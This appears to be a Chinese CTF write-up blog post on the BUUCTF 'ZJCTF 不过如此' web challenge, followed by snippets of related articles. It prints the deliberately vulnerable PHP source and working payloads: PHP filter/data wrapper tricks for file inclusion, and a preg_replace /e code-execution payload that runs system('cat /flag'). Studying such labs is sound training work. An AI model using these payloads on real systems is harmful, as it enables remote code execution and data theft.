BUUCTF WEB ZJCTF,不过如此1

最新推荐文章于 2024-04-16 15:46:25 发布
最新推荐文章于 2024-04-16 15:46:25 发布
阅读量605 收藏 1
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/121876194
版权
本文探讨了一个PHP代码片段,其中涉及preg_replace/e函数可能导致的远程命令执行漏洞。通过提供特定的payload,可以利用该漏洞执行系统命令。作者提到了payload的构造方法,并给出了解决方案的思路,同时提供了参考资料和视频链接以深入理解问题。
摘要由CSDN通过智能技术生成

上来就给源码,很直接

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

没啥好说的,就差把思路写脸上了,text要i have a dream,文件名给你了next.php

直接给payload:?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php
解码后的next.php源码:
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

这里就有意思了,之前遇到过preg_replace /e会有远程命令执行漏洞,现在看来也是这个了
先给payload吧,后面的原理想看就看

/next.php?\S*=${getFlag()}&cmd=system('cat /flag');

\S在正则里非空白匹配,通过preg_match/e的漏洞调用了getFlag函数
原理这篇文章讲的很详细,https://xz.aliyun.com/t/2557

preg_replace函数原型:

mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])
subject匹配pattern,然后会导致replacement的执行,在这里$str去匹配$re,然后会去执行,'strtolower("\\1")'
双引号在里,单引号在外是漏洞的触发条件,因为php会把双引号当成函数,这也就是文章里的第三点
而且.*作为匹配符在$_GET时被替换成_*,这是第二点,所以匹配符也得选的好,\不会被替换
next.php\S*=${phpinfo()}成功
但是直接调用system会发现单引号被转义(外围有单引号),鉴于有现成的GET_flag函数,我们可以间接调用/next.php?\S*=${getFlag()}&cmd=system('cat /flag');

参考视频链接:https://www.bilibili.com/video/BV1C3411s7WF/

显哥无敌
关注
专栏目录
BUUCTF-[ZJCTF 2019]NiZhuanSiWei
lunan的博客
05-15 376
BUUCTF-[ZJCTF 2019]NiZhuanSiWei 一、知识点 1、php各种协议,data://,php:// payload构造: text=data://text/plain,welcome to the zjctf data协议解释:https://www.php.net/manual/zh/wrappers.data.php 2、文件包含 payload构造: file=php://filter/read=convert.base64-encode/resource=useless.
BUUCTF [BJDCTF2020]ZJCTF不过如此
Chu_Jian_Xiong的博客
09-29 656
[BJDCTF2020]ZJCTF不过如此考点PHP伪协议preg_replace远程代码执行实操 考点 PHP伪协议 https://www.cnblogs.com/wjrblogs/p/12285202.html preg_replace远程代码执行 https://zhuanlan.zhihu.com/p/47353283 实操 打开题目 乍一看,显然是一个PHP伪协议的题目,要求"I have a dream",以及提示包含next.php PD9waHAKJGlkID0gJF9HRVRb
[BJDCTF2020]ZJCTF不过如此1
qq_48008847的博客
07-16 1784
通过分析代码,get传入两个参数text和file,text参数利用file_get_contents()函数只读形式打开,打开后内容要与"I have a dream"字符串相匹配,才能执行下面的文件包含$file参数。 看到用的是file_get_contents()函数打开text参数,以及后面的文件包含函数,自然的想到php伪协议的data://协议用filter协议去读下next.php的源码 获取next.php的payload: index.php?text=data://text..
BUU-ZJCTF-不过如此
unexpectedthing的博客
10-08 215
文章目录wp其他知识点 wp 打开环境,还是代码 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></b
web buuctf [BJDCTF2020]ZJCTF不过如此
weixin_44214568的博客
03-23 2019
考点:正则匹配; 正则-反向引用; preg_replace /e模式漏洞 1. 一路做buuctf下来, web buuctf [ZJCTF 2019]NiZhuanSiWei1_半杯雨水敬过客的博客-CSDN博客 和这题的思路一样,不做赘述,主要是利用php伪协议 1.令text=data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=(I have a dream的base64加密) file=php://filter/read=convert..
[BJDCTF2020]ZJCTF不过如此 1
feng的博客
11-16 381
知识点 一些协议 preg_match的/e修正符 正则表达式,涉及到了后向引用。 WP 前面的没啥好说的,text用data协议绕过: ?text=data://text/plain,I have a dream 然后尝试用php的伪协议读一下next.php: &file=php://filter/read=convert.base64-encode/resource=next.php 审一下代码: <?php $id = $_GET['id']; $_SESSION['id']
buuctf-[BJDCTF2020]ZJCTF不过如此
qq_42728977的博客
12-26 2392
[BJDCTF2020]ZJCTF不过如此考点复现参考 考点 preg_replace /e 参数执行漏洞、php伪协议、转义绕过 复现 点开链接 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1&g
BUUCTF [ZJCTF 2019]EasyHeap
BengDouLove的博客
04-08 2795
Partial RELRO 那说明got表可写,可以通过改写got表为想要的函数,堆通常的利用方法 还是老样子,一个堆块管理系统,main函数太长了不放了,就是根据你的输入选择操作 值得一提的是有个这个 这个函数能dedaoflag吗??一会再说,反正system是有了,不用泄露libc了 1.create 可以看到,堆块最多有十个,,还是用了一张表维护着堆块的指针,,这样就让人想把这个...
BUUCTF [ZJCTF 2019]EasyHeap 记第一次堆入门
weixin_45441024的博客
12-27 674
BUUCTF [ZJCTF 2019]EasyHeap 记第一次堆入门 一般的堆题都是这种表单形式的
BUUCTF WEB [BJDCTF2020]ZJCTF不过如此
Y1da的博客
04-22 1789
BUUCTF WEB [BJDCTF2020]ZJCTF不过如此 进入环境后得到源码 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,
[BJDCTF2020]ZJCTF不过如此
05-07 394
<?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_mat.
BUUCTF-web类-[BJDCTF2020]ZJCTF不过如此
weixin_44622228的博客
04-20 2014
BUUCTF-web类-[BJDCTF2020]ZJCTF不过如此 分析代码,ge传入两个参数text和file,text参数利用file_get_contents()函数只读形式打开,打开后内容要与"I have a dream"字符串相匹配,才能执行下面的文件包含$file参数。 看到用的是file_get_contents()函数打开text参数,以及后面的文件包含函数,自然的想到php伪...
[BJDCTF2020]ZJCTF不过如此1详解
最新发布
2301_77451464的博客
04-16 423
preg_replace()的/e模式存在命令执行漏洞。(只要看到了上面这一行代码,就想到用payload:\S*=${phpinfo()})2.用php://filter构造伪协议。1.用data构造伪协议。
【学习笔记 39】 buu [BJDCTF2020]ZJCTF不过如此
weixin_43553654的博客
08-01 349
0x00 知识点 文件包含伪协议 preg_replace()使用的/e模式可以存在远程执行代码 0x01 知识点详解 什么伪协议? 答:PHP伪协议事实上就是支持的协议与封装协议 一共有一下12种 a. file:// — 访问本地文件系统 b. http:// — 访问 HTTP(s) 网址 c. ftp:// — 访问 FTP(s) URLs d. php:// — 访问各个输入/输出流(I/O streams) e. zlib:// — 压缩流 f. data:// — 数据(RFC 23
BUUCTF [web专项39][BJDCTF2020]ZJCTF不过如此
yanglinchiji的博客
11-20 264
这里的 `$pattern` 是一个正则表达式字符串,用于指定搜索的模式, `$replacement` 是替换成的字符串, `$subject` 是要搜索和替换的原始字符串或字符串数组。在 PHP ,`preg_replace` 是一个强大的正则表达式替换函数。它可以在一个字符串使用正则表达式搜索和替换指定的文本。`preg_replace` 函数返回一个替换后的字符串或数组。作为正则表达式匹配条件的参数名 且 这个参数值为的"getFlag();( 开始定义一个捕获分组,并匹配其的子表达式;
BUUCTF- ZJCTF不过如此题目解析
2201_75327657的博客
03-29 318
发现有preg——replace说明有代码执行问题。源码的\\1实际等于\1本身的\1有其他意思。打开查看源码查看有file说明是伪协议。preg——replace相关链接(得到base64编码解析出来为。那就利用filter查看。
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛的一个web题目。其可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF(Server Side Request Forgery)漏洞,可以通过对内网web应用实施攻击获取webshell。因此,在buuctf web题目,可能需要掌握SSRF漏洞的利用和对web应用的渲染函数(render函数)进行利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【CTF】buuctf web 详解(持续更新)](https://blog.csdn.net/m0_52923241/article/details/119641325)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [【BUUCTF刷题】Web解题方法总结(一)](https://blog.csdn.net/qq_45834505/article/details/114276572)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [BUUCTFWeb真题学习整理(一)](https://blog.csdn.net/qq_41429081/article/details/98042205)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值